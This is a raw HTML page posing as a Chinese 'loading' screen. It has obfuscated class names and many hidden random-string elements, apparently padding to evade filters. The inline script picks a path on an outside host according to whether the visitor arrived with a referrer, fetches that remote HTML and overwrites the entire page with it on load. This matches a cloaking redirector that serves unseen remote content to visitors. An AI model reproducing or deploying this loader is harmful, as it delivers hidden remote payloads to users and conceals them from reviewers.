<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .PZlHJ4Mcbl {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .PZlHJ4Mcbl .riReSmdTOAs {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .PZlHJ4Mcbl .content {
            line-height: 50px;
            text-align: center
        }

        .PZlHJ4Mcbl .img {
            width: 100%
        }

        .PZlHJ4Mcbl .WUQM1PF8a {
            text-align: center
        }

        .PZlHJ4Mcbl .WUQM1PF8a span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .PZlHJ4Mcbl .WUQM1PF8a span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .PZlHJ4Mcbl .WUQM1PF8a span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .PZlHJ4Mcbl .WUQM1PF8a span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .PZlHJ4Mcbl .WUQM1PF8a span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .PZlHJ4Mcbl .WUQM1PF8a span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .PZlHJ4Mcbl .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function LuTrtNfy2K(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CbYpgJ = LuTrtNfy2K('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CbYpgJ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CbYpgJ +".html?a=share";
		}
		
        iQh3C646B2=url+"#"+new Date().getTime();
        iQh3C646B2 && function() {
            $.get(iQh3C646B2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >yshjnhC2b7uqVJkC1LRw2v</h1>
<h1 style='display:none' >yshjnhC2b7uqVJkC1LRw2v</h1>
<b style='display:none' >JWtqLGCSKiq6mvymH</b>
<div style='display:none'>X6KcQlLt0Sdl7sd8MUN2mRBHjhBYqI4vS2TF0</div>
<div style='display:none'>X6KcQlLt0Sdl7sd8MUN2mRBHjhBYqI4vS2TF0</div>
<a  href='#' style='display:none'>e7ocW4UZesG</a>
<span style='display:none'>aOj81lsCFU9NCKT7yHwZ0LME</span><div class="PZlHJ4Mcbl">
    <div class="riReSmdTOAs">
        <div class="WUQM1PF8a">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>yG1psuI0ESU90WPIR</p>
<b style='display:none' >wKbchKXz8zv4ywp1O0VycFXhzSEnmL1iNb07IfQVMoGPxD37h5F0QHK4ZfEYECchM</b>
<img  src='' style='display:none'>
<div style='display:none'>YzdrUuFLPsIhOVXv</div>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<span style='display:none'>cOppBZwueFshCVeujT</span>
<li style='display:none' >z2qNMsmPX6sUAvb6Mw76MOdovUXc8y4iZjnOyI</li>
<img  src='' style='display:none'>
<span style='display:none'>cOppBZwueFshCVeujT</span></body>
</html>